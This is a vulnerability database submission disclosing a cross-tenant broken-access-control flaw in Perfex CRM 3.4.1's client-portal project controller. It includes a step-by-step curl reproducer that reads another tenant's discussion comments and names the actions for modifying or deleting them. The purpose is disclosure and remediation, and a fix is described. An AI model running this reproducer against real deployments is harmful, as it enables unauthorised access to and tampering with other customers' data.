| शीर्षक | Canyon Perfex CRM CRM 3.4.1 Improper Authorization |
|---|
| विवरण | Perfex CRM 3.4.1 (and likely all earlier 3.x builds) contains a cross-tenant Insecure Direct Object Reference in the client-portal project controller (application/controllers/Clients.php, Clients::project()).
The handler verifies that the project id in the URL belongs to the authenticated client, but its four inner dispatch actions — "discussion_comments", "new_discussion_comment", "update_discussion_comment", and "delete_discussion_comment", accept the discussion id (and comment id) directly from the POST body with no secondary ownership check. An authenticated client-portal user that owns any one project can read, modify, delete, or inject discussion comments in any other tenant's project by substituting the victim's discussion_id / comment id in the request body.
CWE-639 (Authorization Bypass Through User-Controlled Key), CWE-284 (Improper Access Control).
CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L = 8.1 High.
Minimum reproducer (assumes two client-portal accounts exist, Alice and Bob, each with one project and the "projects" contact permission — the default onboarding workflow):
BASE=http://target.example
JAR=$(mktemp)
TOK=$(curl -s -c "$JAR" "$BASE/authentication/login" | grep -oE 'csrf_token_name" value="[^"]*"' | sed 's/.*value="//;s/"//')
curl -s -c "$JAR" -b "$JAR" -o /dev/null -X POST "$BASE/authentication/login" --data-urlencode "csrf_token_name=$TOK" --data-urlencode "[email protected]" --data-urlencode "password=ClientPass1!"
TOK=$(curl -s -b "$JAR" "$BASE/clients/project/1" | grep -oE '"[a-f0-9]{32}"' | head -1 | tr -d '"')
curl -s -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -X POST "$BASE/clients/project/1" --data-urlencode "csrf_token_name=$TOK" --data-urlencode "action=discussion_comments" --data-urlencode "discussion_id=2" --data-urlencode "discussion_type=regular"
Response is a JSON array containing the victim tenant's discussion comments, served to the attacker. Same pattern applies to action=update_discussion_comment (id=), action=new_discussion_comment (discussion_id=), and action=delete_discussion_comment (id=).
Full technical advisory, complete four-action reproducer, impact analysis, and recommended fix: see the Bytium advisory URL referenced in this submission.
Fix: re-scope each action's referenced discussion to the current project's clientid before invoking the model method. The helper Projects_model::get_discussion($id, $project_id) already exists and accepts a project_id — it simply is not called from these four actions.
|
|---|
| स्रोत | ⚠️ https://bytium.com/insights/perfex-crm-3-4-1-cross-tenant-broken-access-control-on-project-discussion-comments |
|---|
| उपयोगकर्ता | suffer (UID 74855) |
|---|
| सबमिशन | 18/04/2026 04:26 PM (2 महीनों पहले) |
|---|
| संयम | 04/05/2026 05:58 PM (16 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 360979 [CodeCanyon Perfex CRM तक 3.4.1 Tenant Clients.php Clients::project पहचान अधिकार वृद्धि] |
|---|
| अंक | 20 |
|---|